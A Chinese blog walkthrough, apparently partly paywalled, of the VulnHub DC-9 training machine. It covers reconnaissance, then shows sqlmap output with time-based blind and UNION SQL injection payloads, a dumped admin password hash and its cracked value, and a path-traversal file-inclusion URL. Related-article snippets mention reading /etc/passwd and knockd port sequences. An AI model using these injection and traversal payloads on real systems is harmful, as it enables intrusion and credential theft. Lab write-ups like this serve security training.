【vulnhub】【DC系列】DC9 - Knockd 靶机

最新推荐文章于 2024-01-27 01:39:49 发布
最新推荐文章于 2024-01-27 01:39:49 发布
阅读量876 收藏 1
点赞数
分类专栏: 信息安全 # 靶机 文章标签: 网络安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nicky_Zheng/article/details/113174253
版权
本文介绍了在Vulnhub的DC9靶机中,通过信息收集发现了SQL注入和文件包含漏洞。利用knockd程序解锁隐藏端口,成功开启SSH访问。接着通过SSH爆破获取janitor用户,并进行信息收集。最终发现新用户fredf,通过源码分析和写入权限实现权限提升。
摘要由CSDN通过智能技术生成

1、信息收集

使用netdiscover发现靶机 ip:192.168.57.155

使用nmap发现仅开放80端口

1.1、尝试注入

访问页面后,发现search疑似存在SQL注入

使用nmap测试

sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
available databases [3]:
[*] information_schema
[*] Staff
[*] users

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=1' AND (SELECT 5475 FROM (SELECT(SLEEP(5)))MxJV) AND 'gVrp'='gVrp

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a627a71,0x6c484546517947656370474f4b4c6247686350424b51
785975636b79527374735a4366546f477557,0x716b7a7a71),NULL,NULL-- -
---
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
Database: Staff
Table: Users
[1 entry]

# 获取到当前CMS的管理员账号,在线查询后为:transorbital1
+----------+----------------------------------+
| Username | Password                         |
+----------+----------------------------------+
| admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+

cms 用户已获取到,登陆后,发现疑似存在文件包含漏洞

image-20210104143248923

1.2、文件包含fuzz

192.168.57.155/manage.php?a=../../../../..b
# 使用burp对a和b进行变量替换,fuzz发现存在文件包含漏洞,可以读取`passwd`文件,但不能读取`shadow`
# 存在knockd.conf文件

1.3、knockd利用

knockd是一个敲门程序,只有用户按照顺序访问对个端口后,对应对隐藏的端口才会重新开放

最低0.47元/天 解锁文章
d41b
关注
专栏目录
vulnhub - DC 9 (考点:SQL注入&LFI&端口敲门&ssh暴力解密&捉迷藏&python基础&linux修改passwd sudoers提权)
冬萍子癸水
05-29 864
https://www.vulnhub.com/entry/dc-9,412/ nat网络 arp-scan -l扫出比平常多出的ip就是靶机了 nmap 80是进web搜集信息,22是要想到ssh登录拿shell,但是这里要看仔细,22没有开,是filter状态。这里为后面的端口敲门埋下了伏笔。以后遇到这种也要往敲门方向想 PORT STATE SERVICE VERSION 22/t...
VulnhubDC9
大方子
01-16 5409
靶机下载地址:http://www.five86.com/downloads/DC-9.zip 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 实验过程 先进行主机探测,查找靶机的IP地址: arp-scan --interface eth1 192.168.56.1/24 用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112 可以看到DC开放了80端口以及22端口(被过滤) nmap -sC -sV -oA dc-9 192.168.56
dc9靶机(kockd开端口+写文件提权)
qq_45290991的博客
08-22 596
前言 DC系列最后一个靶机,还是延续着之前的传统,中规中矩,却不失新意。正如作者所言 all things must come to an end 所有事情最终都会来到终点,但人生还要继续,带着美好回忆迎接下一次挑战。???? 知识点 knockd服务/etc/pass...
Vulnhub靶机DC-9(端口敲门服务Knockd
过期的秋刀鱼
08-11 566
该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。目前基本上都使用sha-512算法的,但无论是md5还是sha-256都仍然支持;用户名:密码hash值:uid:gid:说明:家目录:登陆后使用的shell。$salt$是加密时使用的salt,hashed才是真正的密码部分;下的一样的格式,保存在pass文件中。参数,读取请求的数据,来爆破数据库。
knockd - 敲敲門, 敲對了就開門
weixin_33910759的博客
09-18 833
FROM: http://jamyy.dyndns.org/blog/2010/08/2596.html目的: 使用 knockd 保護指定埠口 作法: 使用者連線前必須先依序 '敲擊' 指定埠號 (port knocking), knockd 才開放受到保護的埠口 環境: Fedora 10 安裝 knockd cd /tmp wget http://ww...
Vulnhub靶机DC系列-DC-9
m0_54525483的博客
01-13 2725
Vulnhub靶机DC系列-DC-9 靶场环境 靶场名称:DC-9 靶场地址:https://www.vulnhub.com/entry/dc-9,412/ 下载地址: DC-9.zip (Size: 700 MB) Download: http://www.five86.com/downloads/DC-9.zip Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip Download (Torrent): https://download
Vulnhub靶机:DC-9渗透详细过程(DC系列完结)
IerkeU的博客
03-28 3789
信息收集 nmap -A -sV -p- -T4 192.168.132.156 目前发现只开放80端口,去web页面搜索一下 有一处后台登陆、一处搜索处 在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST 输出文件:sql进入kali一把梭 SQLMAP sqlmap -r sql --dbs --dump sqlmap -r sql -D users -T UserDetails -C id,username,password --dump 将admin
Vulnhub靶场渗透测试系列DC-9(knockd敲门服务)
qq_45722813的博客
12-12 6573
Vulnhub靶场渗透测试系列DC-9 靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/
VulnHub靶机通关)DC-9
yang1234567898的博客
01-23 795
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
knockd敲门服务
最新发布
a1_pha的博客
01-27 688
端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。其中sequence设置序列号,seq_timeout设置超时时间。
DC-9(knockd服务)
m0_66299232的博客
10-11 1275
find / -name "test.py" 2>/dev/null //查找test.py文件位置。5.依次敲击 7469 8475 9842 端口实现敲门操作 ,再次用nmap发现ssh开放。file=../../../../etc/passwd 成功查询到passwd文件。4.openssl passwd -1 -salt 123456 //给密码加盐。1>抓个包,把抓到的信息写进一个文本里,sqlmap跑一下。虚拟机网络链接模式:桥接模式。1>用爆破出的用户名密码登录。1.探测目标靶机ip。
通过Knockd隐藏SSH,让黑客看不见你的服务器
大方子
01-11 3035
0X01设备信息: Ubuntu14.04:192.168.61.135 Kali:192.168.61.130 0X02配置过程: 先用Kali探测下Ubuntu的端口情况,可以看到Ubuntu的22端口是正常开放的 接下来在Ubuntu上安装Knockd apt-get install update apt-get install build-essential -y apt-get install knockd -y 安装完成后就cat下Knockd的配置/...
mysql post 注入工具类_【Mysql sql inject】POST方法BASE64编码注入write-up
weixin_39943442的博客
01-27 247
翻到群里的小伙伴发出一道POST型SQL注入题,简单抓包判断出题目需要base64编码后才执行sql语句,为学习下SQL注入出题与闯关的思路+工作不是很忙,所以花点时间玩了一下,哈哈哈哈哈哈哈哈哈1 function onSearch()2 {3 var pwd=document.forms[0].inText.value;4 $.base64.utf8encode =true;5 documen...
DC9靶场渗透
qq_20032803的博客
02-03 654
1.发现主机/扫描 root@kali:~# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.100.128 netmask 255.255.255.0 broadcast 192.168.100.255 inet6 fe80::20c:29ff:fe72:6e3e prefixlen 64 scopeid 0x20<link>
【AFL(六)】AFL源码中的那些头文件
未配妥剑 已入江湖
12-24 252
前言: AFL中有一些自定义的头文件,说不上很重要,但是又不得不说。一共有五个头文件需要说一下: 当然还有一个afl-as.h文件,这个跟插桩过程相关,暂且先不谈。 【一】config.h 顾名思义,属于配置类的头文件,包含大量的宏定义,用来规定。 宏定义大概分三个部分,刚开始是一些通用的参数,如输入输出文件的大小,用户的颜色配置;第二部分是跟变异有关的,比如在文件变异时候的inte...
对 HTTP 请求的 Host 参数进行 SQL 注入
weixin_34037977的博客
01-19 531
最近收到了一个漏洞通报,居然是对 HTTP 请求的 Host 参数进行 SQL 注入,比较有趣,需要总结一下。 如下是经过简化的具体的渗透测试命令,假设主机名为 aaa.bbb.ccc: $ more sql.txt GET / HTTP/1.1 Host: aaa.bbb.ccc* $ sqlmap --host http://...
DC-9靶机渗透测试
读书 买花 长大
05-21 582
DC-9
Ethical.Hacking.2021.10:STEALING AND CRACKING PASSWORDS
lm19770429的专栏
12-20 437
Understanding HTTP Requests Using SQLMap 与书中不一致,--sqlmap-shell已经不用了,改为--shell了,如下: sudo sqlmap -u "http://192.168.1.102/mutillidae/index.php?page=user-info.php&username=&password=&" --shell 注意-u 后面的url要用“”括起来 ...
Job for knockd.service failed because the control process exited with error code.
11-07
但是,根据该问题的描述,可能是由于knockd服务的控制进程出现错误代码而导致的。knockd是一个用于隐藏端口的工具,它允许用户通过敲击特定的端口序列来打开或关闭端口。如果knockd服务的控制进程出现错误代码,可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值